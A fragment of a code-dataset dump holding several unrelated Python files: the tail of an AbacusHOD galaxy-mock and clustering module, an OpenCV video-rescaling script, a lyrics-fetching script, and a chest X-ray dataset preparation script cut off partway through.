\n for eslab in range(params['numslabs']):\n \n if 'ELG' not in self.tracers.keys() and 'QSO' not in self.tracers.keys():\n halofilename = subsample_dir / ('halos_xcom_%d_seed600_abacushod'%eslab)\n particlefilename = subsample_dir / ('particles_xcom_%d_seed600_abacushod'%eslab)\n else:\n halofilename = subsample_dir / ('halos_xcom_%d_seed600_abacushod_MT'%eslab)\n particlefilename = subsample_dir / ('particles_xcom_%d_seed600_abacushod_MT'%eslab) \n\n if self.want_ranks:\n particlefilename = str(particlefilename) + '_withranks'\n halofilename = str(halofilename) + '_new.h5'\n particlefilename = str(particlefilename) + '_new.h5'\n\n newfile = h5py.File(halofilename, 'r')\n newpart = h5py.File(particlefilename, 'r')\n Nhalos[eslab] = len(newfile['halos'])\n Nparts[eslab] = len(newpart['particles'])\n Nhalos = Nhalos.astype(int)\n Nparts = Nparts.astype(int)\n Nhalos_tot = int(np.sum(Nhalos))\n Nparts_tot = int(np.sum(Nparts))\n\n # list holding individual slabs\n hpos = np.empty((Nhalos_tot, 3))\n hvel = np.empty((Nhalos_tot, 3))\n hmass = np.empty([Nhalos_tot])\n hid = np.empty([Nhalos_tot], dtype = int)\n hmultis = np.empty([Nhalos_tot])\n hrandoms = np.empty([Nhalos_tot])\n hveldev = np.empty([Nhalos_tot])\n hdeltac = np.empty([Nhalos_tot])\n hfenv = np.empty([Nhalos_tot])\n\n ppos = np.empty((Nparts_tot, 3))\n pvel = np.empty((Nparts_tot, 3))\n phvel = np.empty((Nparts_tot, 3))\n phmass = np.empty([Nparts_tot])\n phid = np.empty([Nparts_tot], dtype = int)\n pNp = np.empty([Nparts_tot])\n psubsampling = np.empty([Nparts_tot])\n prandoms = np.empty([Nparts_tot])\n pdeltac = np.empty([Nparts_tot])\n pfenv = np.empty([Nparts_tot])\n\n # ranks\n if self.want_ranks:\n p_ranks = np.empty([Nparts_tot])\n p_ranksv = np.empty([Nparts_tot])\n p_ranksp = np.empty([Nparts_tot])\n p_ranksr = np.empty([Nparts_tot])\n\n # B.H. make into ASDF\n # load all the halo and particle data we need\n halo_ticker = 0\n parts_ticker = 0\n for eslab in range(params['numslabs']):\n print(\"Loading simulation by slab, \", eslab)\n \n if 'ELG' not in self.tracers.keys() and 'QSO' not in self.tracers.keys():\n halofilename = subsample_dir / ('halos_xcom_%d_seed600_abacushod'%eslab)\n particlefilename = subsample_dir / ('particles_xcom_%d_seed600_abacushod'%eslab)\n else:\n halofilename = subsample_dir / ('halos_xcom_%d_seed600_abacushod_MT'%eslab)\n particlefilename = subsample_dir / ('particles_xcom_%d_seed600_abacushod_MT'%eslab) \n\n if self.want_ranks:\n particlefilename = str(particlefilename) + '_withranks'\n halofilename = str(halofilename) + '_new.h5'\n particlefilename = str(particlefilename) + '_new.h5'\n\n newfile = h5py.File(halofilename, 'r')\n maskedhalos = newfile['halos']\n\n # extracting the halo properties that we need\n halo_pos = maskedhalos[\"x_L2com\"] # halo positions, Mpc / h\n #halo_ids = maskedhalos[\"id\"].astype(int) # halo IDs\n halo_ids = maskedhalos[\"haloindex\"].astype(int) # halo IDs\n halo_vels = maskedhalos['v_L2com'] # halo velocities, km/s\n halo_vel_dev = maskedhalos[\"randoms_gaus_vrms\"] # halo velocity dispersions, km/s\n halo_mass = maskedhalos['N']*params['Mpart'] # halo mass, Msun / h, 200b\n halo_deltac = maskedhalos['deltac_rank'] # halo concentration\n halo_fenv = maskedhalos['fenv_rank'] # halo velocities, km/s\n halo_pstart = maskedhalos['npstartA'].astype(int) # starting index of particles\n halo_pnum = maskedhalos['npoutA'].astype(int) # number of particles \n halo_multi = maskedhalos['multi_halos']\n halo_submask = maskedhalos['mask_subsample'].astype(bool)\n halo_randoms = maskedhalos['randoms']\n\n hpos[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_pos\n hvel[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_vels\n hmass[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_mass\n hid[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_ids\n hmultis[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_multi\n hrandoms[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_randoms\n hveldev[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_vel_dev\n hdeltac[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_deltac\n hfenv[halo_ticker: halo_ticker + Nhalos[eslab]] = halo_fenv\n halo_ticker += Nhalos[eslab]\n\n # extract particle data that we need\n newpart = h5py.File(particlefilename, 'r')\n subsample = newpart['particles']\n part_pos = subsample['pos']\n part_vel = subsample['vel']\n part_hvel = subsample['halo_vel']\n part_halomass = subsample['halo_mass'] # msun / h\n part_haloid = subsample['halo_id'].astype(int)\n part_Np = subsample['Np'] # number of particles that end up in the halo\n part_subsample = subsample['downsample_halo']\n part_randoms = subsample['randoms']\n part_deltac = subsample['halo_deltac']\n part_fenv = subsample['halo_fenv']\n\n if self.want_ranks:\n part_ranks = subsample['ranks']\n part_ranksv = subsample['ranksv']\n part_ranksp = subsample['ranksp']\n part_ranksr = subsample['ranksr']\n p_ranks[parts_ticker: parts_ticker + Nparts[eslab]] = part_ranks\n p_ranksv[parts_ticker: parts_ticker + Nparts[eslab]] = part_ranksv\n p_ranksp[parts_ticker: parts_ticker + Nparts[eslab]] = part_ranksp\n p_ranksr[parts_ticker: parts_ticker + Nparts[eslab]] = part_ranksr\n\n # # part_data_slab += [part_ranks, part_ranksv, part_ranksp, part_ranksr]\n # particle_data = vstack([particle_data, new_part_table])\n ppos[parts_ticker: parts_ticker + Nparts[eslab]] = part_pos\n pvel[parts_ticker: parts_ticker + Nparts[eslab]] = part_vel\n phvel[parts_ticker: parts_ticker + Nparts[eslab]] = part_hvel\n phmass[parts_ticker: parts_ticker + Nparts[eslab]] = part_halomass\n phid[parts_ticker: parts_ticker + Nparts[eslab]] = part_haloid\n pNp[parts_ticker: parts_ticker + Nparts[eslab]] = part_Np\n psubsampling[parts_ticker: parts_ticker + Nparts[eslab]] = part_subsample\n prandoms[parts_ticker: parts_ticker + Nparts[eslab]] = part_randoms\n pdeltac[parts_ticker: parts_ticker + Nparts[eslab]] = part_deltac\n pfenv[parts_ticker: parts_ticker + Nparts[eslab]] = part_fenv\n parts_ticker += Nparts[eslab]\n\n halo_data = {\"hpos\": hpos, \n \"hvel\": hvel, \n \"hmass\": hmass, \n \"hid\": hid, \n \"hmultis\": hmultis, \n \"hrandoms\": hrandoms, \n \"hveldev\": hveldev, \n \"hdeltac\": hdeltac, \n \"hfenv\": hfenv}\n pweights = 1/pNp/psubsampling\n particle_data = {\"ppos\": ppos, \n \"pvel\": pvel, \n \"phvel\": phvel, \n \"phmass\": phmass, \n \"phid\": phid, \n \"pweights\": pweights, \n \"prandoms\": prandoms, \n \"pdeltac\": pdeltac, \n \"pfenv\": pfenv}\n if self.want_ranks:\n particle_data['pranks'] = p_ranks\n particle_data['pranksv'] = p_ranksv\n particle_data['pranksp'] = p_ranksp\n particle_data['pranksr'] = p_ranksr\n else:\n particle_data['pranks'] = np.ones(Nparts_tot)\n particle_data['pranksv'] = np.ones(Nparts_tot)\n particle_data['pranksp'] = np.ones(Nparts_tot)\n particle_data['pranksr'] = np.ones(Nparts_tot)\n \n return halo_data, particle_data, params, mock_dir\n\n \n def run_hod(self, tracers = None, want_rsd = True, write_to_disk = False, Nthread = 16, verbose = False):\n \"\"\"\n Runs a custom HOD.\n\n Parameters\n ----------\n ``tracers``: dict\n dictionary of multi-tracer HOD. ``tracers['LRG']`` is the dictionary of LRG HOD parameters,\n overwrites the ``LRG_params`` argument in the constructor.\n Same for keys ``'ELG'`` and ``'QSO'``.\n \n ``want_rsd``: bool \n enable RSD? default ``True``.\n\n ``write_to_disk``: bool \n output to disk? default ``False``. Setting to ``True`` decreases performance. \n\n ``Nthread``: int\n number of threads in the HOD run. Default 16. \n\n ``verbose``: bool, \n detailed stdout? default ``False``.\n\n Returns\n -------\n mock_dict: dict\n dictionary of galaxy outputs. Contains keys ``'LRG'``, ``'ELG'``, and ``'QSO'``. Each\n tracer key corresponds to a sub-dictionary that contains the galaxy properties with keys \n ``'x'``, ``'y'``, ``'z'``, ``'vx'``, ``'vy'``, ``'vz'``, ``'mass'``, ``'id'``, ``Ncent'``.\n The coordinates are in Mpc/h, and the velocities are in km/s.\n The ``'mass'`` refers to host halo mass and is in units of Msun/h.\n The ``'id'`` refers to halo id, and the ``'Ncent'`` key refers to number of\n central galaxies for that tracer. The first ``'Ncent'`` galaxies \n in the catalog are always centrals and the rest are satellites. \n\n \"\"\"\n if tracers == None:\n tracers = self.tracers\n\n mock_dict = gen_gal_cat(self.halo_data, self.particle_data, tracers, self.params, Nthread, \n enable_ranks = self.want_ranks, \n rsd = want_rsd, \n write_to_disk = write_to_disk, \n savedir = self.mock_dir,\n verbose = False)\n\n return mock_dict\n\n def compute_ngal(self, tracers = None, Nthread = 16):\n \"\"\"\n Computes the number of each tracer generated by the HOD\n\n Parameters\n ----------\n ``tracers``: dict\n dictionary of multi-tracer HOD. ``tracers['LRG']`` is the dictionary of LRG HOD parameters,\n overwrites the ``LRG_params`` argument in the constructor.\n Same for keys ``'ELG'`` and ``'QSO'``.\n\n ``Nthread``: int\n Number of threads in the HOD run. Default 16. \n\n Returns\n -------\n ngal_dict: dict\n dictionary of number of each tracer. \n\n fsat_dict: dict\n dictionary of satellite fraction of each tracer.\n\n \"\"\"\n if tracers == None:\n tracers = self.tracers\n\n ngal_dict = {}\n fsat_dict = {}\n for etracer in tracers.keys():\n tracer_hod = tracers[etracer]\n if etracer == 'LRG':\n newngal = AbacusHOD._compute_ngal_lrg(\n self.logMbins, self.deltacbins, self.fenvbins, self.halo_mass_func,\n tracer_hod['logM_cut'], tracer_hod['logM1'], tracer_hod['sigma'], \n tracer_hod['alpha'], tracer_hod['kappa'], tracer_hod['Acent'], \n tracer_hod['Asat'], tracer_hod['Bcent'], tracer_hod['Bsat'], tracer_hod['ic'], Nthread)\n ngal_dict[etracer] = newngal[0] + newngal[1]\n fsat_dict[etracer] = newngal[1] / (newngal[0] + newngal[1])\n elif etracer == 'ELG':\n newngal = AbacusHOD._compute_ngal_elg(\n self.logMbins, self.deltacbins, self.fenvbins, self.halo_mass_func, \n tracer_hod['p_max'], tracer_hod['Q'], tracer_hod['logM_cut'], \n tracer_hod['kappa'], tracer_hod['sigma'], tracer_hod['logM1'], \n tracer_hod['alpha'], tracer_hod['gamma'], tracer_hod['A_s'], \n tracer_hod['Acent'], tracer_hod['Asat'], tracer_hod['Bcent'], tracer_hod['Bsat'], Nthread) \n ngal_dict[etracer] = newngal[0] + newngal[1]\n fsat_dict[etracer] = newngal[1] / (newngal[0] + newngal[1])\n elif etracer == 'QSO':\n newngal = AbacusHOD._compute_ngal_qso(\n self.logMbins, self.deltacbins, self.fenvbins, self.halo_mass_func, \n tracer_hod['p_max'], tracer_hod['logM_cut'], \n tracer_hod['kappa'], tracer_hod['sigma'], tracer_hod['logM1'], \n tracer_hod['alpha'], tracer_hod['A_s'], \n tracer_hod['Acent'], tracer_hod['Asat'], tracer_hod['Bcent'], tracer_hod['Bsat'], Nthread) \n ngal_dict[etracer] = newngal[0] + newngal[1]\n fsat_dict[etracer] = newngal[1] / (newngal[0] + newngal[1])\n return ngal_dict, fsat_dict\n\n @staticmethod\n @njit(fastmath = True, parallel = True)\n def _compute_ngal_lrg(logMbins, deltacbins, fenvbins, halo_mass_func,\n logM_cut, logM1, sigma, alpha, kappa, Acent, Asat, Bcent, Bsat, ic, Nthread):\n \"\"\"\n internal helper to computer number of LRGs\n \"\"\"\n numba.set_num_threads(Nthread)\n\n logMs = 0.5*(logMbins[1:] + logMbins[:-1])\n deltacs = 0.5*(deltacbins[1:] + deltacbins[:-1])\n fenvs = 0.5*(fenvbins[1:] + fenvbins[:-1])\n ngal_cent = 0\n ngal_sat = 0\n for i in numba.prange(len(logMbins) - 1):\n for j in range(len(deltacbins) - 1):\n for k in range(len(fenvbins) - 1):\n Mh_temp = 10**logMs[i]\n logM_cut_temp = logM_cut + Acent * deltacs[j] + Bcent * fenvs[k]\n M1_temp = 10**(logM1 + Asat * deltacs[j] + Bsat * fenvs[k])\n ncent_temp = n_cen_LRG(Mh_temp, logM_cut_temp, sigma)\n nsat_temp = n_sat_LRG_modified(Mh_temp, logM_cut_temp, \n 10**logM_cut_temp, M1_temp, sigma, alpha, kappa)\n ngal_cent += halo_mass_func[i, j, k] * ncent_temp * ic\n ngal_sat += halo_mass_func[i, j, k] * nsat_temp * ic\n return ngal_cent, ngal_sat\n\n @staticmethod\n @njit(fastmath = True, parallel = True)\n def _compute_ngal_elg(logMbins, deltacbins, fenvbins, halo_mass_func, p_max, Q,\n logM_cut, kappa, sigma, logM1, alpha, gamma, A_s, Acent, Asat, Bcent, Bsat, Nthread):\n \"\"\"\n internal helper to computer number of LRGs\n \"\"\"\n numba.set_num_threads(Nthread)\n\n logMs = 0.5*(logMbins[1:] + logMbins[:-1])\n deltacs = 0.5*(deltacbins[1:] + deltacbins[:-1])\n fenvs = 0.5*(fenvbins[1:] + fenvbins[:-1])\n ngal_cent = 0\n ngal_sat = 0\n for i in numba.prange(len(logMbins) - 1):\n for j in range(len(deltacbins) - 1):\n for k in range(len(fenvbins) - 1):\n Mh_temp = 10**logMs[i]\n logM_cut_temp = logM_cut + Acent * deltacs[j] + Bcent * fenvs[k]\n M1_temp = 10**(logM1 + Asat * deltacs[j] + Bsat * fenvs[k])\n ncent_temp = N_cen_ELG_v1(Mh_temp, p_max, Q, logM_cut_temp, sigma, gamma)\n nsat_temp = N_sat_generic(Mh_temp, 10**logM_cut_temp, kappa, M1_temp, alpha, A_s)\n ngal_cent += halo_mass_func[i, j, k] * ncent_temp\n ngal_sat += halo_mass_func[i, j, k] * nsat_temp\n return ngal_cent, ngal_sat\n\n @staticmethod\n @njit(fastmath = True, parallel = True)\n def _compute_ngal_qso(logMbins, deltacbins, fenvbins, halo_mass_func, p_max,\n logM_cut, kappa, sigma, logM1, alpha, A_s, Acent, Asat, Bcent, Bsat, Nthread):\n \"\"\"\n internal helper to computer number of LRGs\n \"\"\"\n numba.set_num_threads(Nthread)\n\n logMs = 0.5*(logMbins[1:] + logMbins[:-1])\n deltacs = 0.5*(deltacbins[1:] + deltacbins[:-1])\n fenvs = 0.5*(fenvbins[1:] + fenvbins[:-1])\n ngal_cent = 0\n ngal_sat = 0\n for i in numba.prange(len(logMbins) - 1):\n for j in range(len(deltacbins) - 1):\n for k in range(len(fenvbins) - 1):\n Mh_temp = 10**logMs[i]\n logM_cut_temp = logM_cut + Acent * deltacs[j] + Bcent * fenvs[k]\n M1_temp = 10**(logM1 + Asat * deltacs[j] + Bsat * fenvs[k])\n ncent_temp = N_cen_QSO(Mh_temp, p_max, logM_cut_temp, sigma)\n nsat_temp = N_sat_generic(Mh_temp, 10**logM_cut_temp, kappa, M1_temp, alpha, A_s)\n ngal_cent += halo_mass_func[i, j, k] * ncent_temp * ic\n ngal_sat += halo_mass_func[i, j, k] * nsat_temp * ic\n return ngal_cent, ngal_sat\n\n def compute_clustering(self, mock_dict, *args, **kwargs):\n \"\"\"\n Computes summary statistics, currently enabling ``wp`` and ``xirppi``.\n\n Parameters\n ----------\n ``mock_dict``: dict\n dictionary of tracer positions. Output of ``run_hod``. \n\n ``Ntread``: int\n number of threads in the HOD run. Default 16. \n\n ``rpbins``: np.array\n array of transverse bins in Mpc/h.\n\n ``pimax``: int\n maximum bin edge along the line of sight direction, in Mpc/h. \n\n ``pi_bin_size``: int\n size of bin along the line of sight. Currently, we only support linear binning along the line of sight. \n\n Returns\n -------\n clustering: dict\n dicionary of summary statistics. Auto-correlations/spectra can be\n accessed with keys such as ``'LRG_LRG'``. Cross-correlations/spectra can be \n accessed with keys such as ``'LRG_ELG'``. \n \"\"\"\n if self.clustering_type == 'xirppi':\n clustering = self.compute_xirppi(mock_dict, *args, **kwargs)\n elif self.clustering_type == 'wp':\n clustering = self.compute_wp(mock_dict, *args, **kwargs)\n return clustering\n \n def compute_xirppi(self, mock_dict, rpbins, pimax, pi_bin_size, Nthread = 8):\n \"\"\"\n Computes :math:`\\\\xi(r_p, \\\\pi)`.\n\n Parameters\n ----------\n ``mock_dict``: dict\n dictionary of tracer positions. Output of ``run_hod``. \n\n ``Ntread``: int\n number of threads in the HOD run. Default 16. \n\n ``rpbins``: np.array\n array of transverse bins in Mpc/h.\n\n ``pimax``: int\n maximum bin edge along the line of sight direction, in Mpc/h. \n\n ``pi_bin_size``: int\n size of bin along the line of sight. Currently, we only support linear binning along the line of sight. \n\n Returns\n -------\n clustering: dict\n dicionary of summary statistics. Auto-correlations/spectra can be\n accessed with keys such as ``'LRG_LRG'``. Cross-correlations/spectra can be \n accessed with keys such as ``'LRG_ELG'``. \n \"\"\"\n clustering = {}\n for i1, tr1 in enumerate(mock_dict.keys()):\n x1 = mock_dict[tr1]['x']\n y1 = mock_dict[tr1]['y']\n z1 = mock_dict[tr1]['z']\n for i2, tr2 in enumerate(mock_dict.keys()):\n if i1 > i2: continue # cross-correlations are symmetric\n if i1 == i2: # auto corr\n clustering[tr1+'_'+tr2] = calc_xirppi_fast(x1, y1, z1, rpbins, pimax, pi_bin_size, \n self.lbox, Nthread)\n else:\n x2 = mock_dict[tr2]['x']\n y2 = mock_dict[tr2]['y']\n z2 = mock_dict[tr2]['z']\n clustering[tr1+'_'+tr2] = calc_xirppi_fast(x1, y1, z1, rpbins, pimax, pi_bin_size, \n self.lbox, Nthread, x2 = x2, y2 = y2, z2 = z2)\n clustering[tr2+'_'+tr1] = clustering[tr1+'_'+tr2]\n return clustering\n\n def compute_wp(self, mock_dict, rpbins, pimax, pi_bin_size, Nthread = 8):\n \"\"\"\n Computes :math:`w_p`.\n\n Parameters\n ----------\n ``mock_dict``: dict\n dictionary of tracer positions. Output of ``run_hod``. \n\n ``Ntread``: int\n number of threads in the HOD run. Default 16. \n\n ``rpbins``: np.array\n array of transverse bins in Mpc/h.\n\n ``pimax``: int\n maximum bin edge along the line of sight direction, in Mpc/h. \n\n ``pi_bin_size``: int\n size of bin along the line of sight. Currently, we only support linear binning along the line of sight. \n\n Returns\n -------\n clustering: dict\n dicionary of summary statistics. Auto-correlations/spectra can be\n accessed with keys such as ``'LRG_LRG'``. Cross-correlations/spectra can be \n accessed with keys such as ``'LRG_ELG'``. \n \"\"\"\n clustering = {}\n for i1, tr1 in enumerate(mock_dict.keys()):\n x1 = mock_dict[tr1]['x']\n y1 = mock_dict[tr1]['y']\n z1 = mock_dict[tr1]['z']\n for i2, tr2 in enumerate(mock_dict.keys()):\n if i1 > i2: continue # cross-correlations are symmetric\n if i1 == i2:\n clustering[tr1+'_'+tr2] = calc_wp_fast(x1, y1, z1, rpbins, pimax, self.lbox, Nthread)\n else:\n x2 = mock_dict[tr2]['x']\n y2 = mock_dict[tr2]['y']\n z2 = mock_dict[tr2]['z']\n clustering[tr1+'_'+tr2] = calc_wp_fast(x1, y1, z1, rpbins, pimax, self.lbox, Nthread, \n x2 = x2, y2 = y2, z2 = z2)\n clustering[tr2+'_'+tr1] = clustering[tr1+'_'+tr2]\n return clustering\n\n def gal_reader(self, output_dir = None, simname = None, \n sim_dir = None, z_mock = None, want_rsd = None, tracers = None):\n \"\"\"\n Loads galaxy data given directory and return a ``mock_dict`` dictionary. \n\n Parameters\n ----------\n ``sim_name``: str\n name of the simulation volume, e.g. 'AbacusSummit_base_c000_ph006'. \n\n ``sim_dir``: str\n the directory that the simulation lives in, e.g. '/path/to/AbacusSummit/'. \n\n ``output_dir``: str\n the diretory to save galaxy to, e.g. '/my/output/galalxies'. \n\n ``z_mock``: floa\n which redshift slice, e.g. 0.5. \n\n ``want_rsd``: bool\n RSD?\n\n ``tracers``: dict\n dictionary of tracer types to load, e.g. `{'LRG', 'ELG'}`.\n\n Returns\n -------\n ``mock_dict``: dict\n dictionary of tracer positions. Output of ``run_hod``. \n\n \"\"\"\n\n if output_dir == None:\n output_dir = Path(self.output_dir)\n if simname == None:\n simname = Path(self.sim_name)\n if sim_dir == None:\n sim_dir = Path(self.sim_dir)\n if z_mock == None:\n z_mock = self.z_mock\n if want_rsd == None:\n want_rsd = self.want_rsd\n if tracers == None:\n tracers = self.tracers.keys()\n mock_dir = output_dir / simname / ('z%4.3f'%self.z_mock)\n\n if want_rsd:\n rsd_string = \"_rsd\"\n else:\n rsd_string = \"\"\n\n outdir = (self.mock_dir) / (\"galaxies\"+rsd_string)\n\n mockdict = {}\n for tracer in tracers:\n mockdict[tracer] = ascii.read(outdir/(tracer+'s.dat'))\n return mockdict\n\n\n", "repo_name": "abacusorg/abacus_lc_cat", "sub_path": "abacus_hod/hod/abacus_hod.py", "file_name": "abacus_hod.py", "file_ext": "py", "file_size_in_byte": 42084, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.logspace", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.histogramdd", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 311, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 326, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 327, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 328, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 333, "usage_type": "call"}, {"api_name": "asdf.open", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 355, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 370, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 381, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 392, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 403, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 406, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 427, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 457, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 522, "usage_type": "call"}, {"api_name": "tpcf_corrfunc.calc_xirppi_fast", "line_number": 782, "usage_type": "call"}, {"api_name": "tpcf_corrfunc.calc_xirppi_fast", "line_number": 788, "usage_type": "call"}, {"api_name": "tpcf_corrfunc.calc_wp_fast", "line_number": 829, "usage_type": "call"}, {"api_name": "tpcf_corrfunc.calc_wp_fast", "line_number": 834, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 872, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 874, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 876, "usage_type": "call"}, {"api_name": "astropy.io.ascii.read", "line_number": 894, "usage_type": "call"}, {"api_name": "astropy.io.ascii", "line_number": 894, "usage_type": "name"}]} +{"seq_id": "38126293713", "text": "import cv2 as cv\n\n# read Images\n\n# img = cv.imread('Resources/Photos/cat.jpg')\n# cv.imshow('cat',img)\n\ndef rescale(frame,scale=0.75):\n width = int(frame.shape[1]*scale)\n height = int(frame.shape[0]*scale)\n\n dimension = (width,height)\n\n return cv.resize(frame,dimension,interpolation = cv.INTER_AREA)\n\n\nvid = cv.VideoCapture('Resources/Videos/dog.mp4')\nwhile True:\n isTrue, frame = vid.read()\n image = cv.flip(frame, 1)\n\n frame_resize = rescale(frame)\n\n cv.imshow('Video',image)\n cv.imshow('vid',frame_resize)\n\n \n if cv.waitKey(20) & 0xFF==ord('d'):\n break\n\nvid.release()\ncv.destroyAllWindows()\n\n\ncv.waitKey(0)", "repo_name": "ankur-raut/openCV", "sub_path": "rescale.py", "file_name": "rescale.py", "file_ext": "py", "file_size_in_byte": 649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "cv2.resize", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "34018316799", "text": "import json\r\nimport pylyrics3\r\nfrom flask import Flask, render_template\r\nimport markovify\r\n\r\n\r\n# app = Flask(__name__, static_url_path='/static')\r\ndef getlyrics():\r\n blinklyrics = pylyrics3.get_artist_lyrics('Blink-182')\r\n for k, v in blinklyrics.items():\r\n print(v)\r\n\r\n with open('blinklyrics.txt', 'w') as file:\r\n file.write(json.dumps(blinklyrics))\r\n with open(\"blinklyric.txt\", 'w') as f:\r\n for value in blinklyrics.items():\r\n f.write(value)\r\n\r\n # @app.route(\"/\")\r\n# def index():\r\n# ewords = smithize()\r\n# while ewords is None:\r\n# ewords = smithize()\r\n# return render_template(\"index.html\", words=ewords)\r\ngetlyrics()\r\n", "repo_name": "ReidTissing/sos", "sub_path": "blink.py", "file_name": "blink.py", "file_ext": "py", "file_size_in_byte": 689, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "pylyrics3.get_artist_lyrics", "line_number": 9, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "12065046472", "text": "import os \nimport ocifs\nfrom ocifs import OCIFileSystem\nfrom zipfile import ZipFile \nimport random\nimport shutil\nfrom ads.dataset.factory import DatasetFactory\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\n\nfs = OCIFileSystem()\n\n# Creating the local directory \ndirpath = f\"./data/\"\nif not os.path.exists(dirpath):\n os.makedirs(dirpath)\n\n# Downloading the data from Object Storage using OCIFS (https://github.com/oracle/ocifs)\nif os.path.exists(os.path.join(dirpath, \"chest_xrays.zip\")):\n with ZipFile(os.path.join(dirpath, \"chest_xrays.zip\"), 'r') as zipf:\n zipf.extractall(dirpath)\nelse:\n fs.download('oci://hosted-ds-datasets@bigdatadatasciencelarge/chest-xrays/ChestXRay2017.zip',os.path.join(dirpath, \"chest_xrays.zip\"))\n with ZipFile(os.path.join(dirpath, \"chest_xrays.zip\"), 'r') as zipf:\n zipf.extractall(dirpath)\n \ntrain_dir = \"./data/chest_xray/train/\"\ntest_dir = \"./data/chest_xray/test/\"\nvalid_dir = f\"./data/chest_xray/validation/\"\nif not os.path.exists(valid_dir):\n os.makedirs(valid_dir)\n \nnormal_train = \"./data/chest_xray/train/NORMAL/\"\npneumonia_train = \"./data/chest_xray/train/PNEUMONIA/\"\n\nnormal_images = os.listdir(normal_train)\npneumonia_images = os.listdir(pneumonia_train)\n\nvalid_dir_normal = os.path.join(valid_dir,\"NORMAL\")\nif not os.path.exists(valid_dir_normal):\n os.makedirs(valid_dir_normal)\n\nvalid_dir_pneumonia = os.path.join(valid_dir,\"PNEUMONIA\")\nif not os.path.exists(valid_dir_pneumonia):\n os.makedirs(valid_dir_pneumonia) \n \n# validation sample: \nnb_validation_normal = 8 \nnb_validation_pneumonia = 8 \n\nvalidation_normal_files = random.sample(normal_images, k=nb_validation_normal)\nvalidation_pneumonia_files = random.sample(pneumonia_images, k=nb_validation_pneumonia) \n\nfor x in validation_normal_files: \n 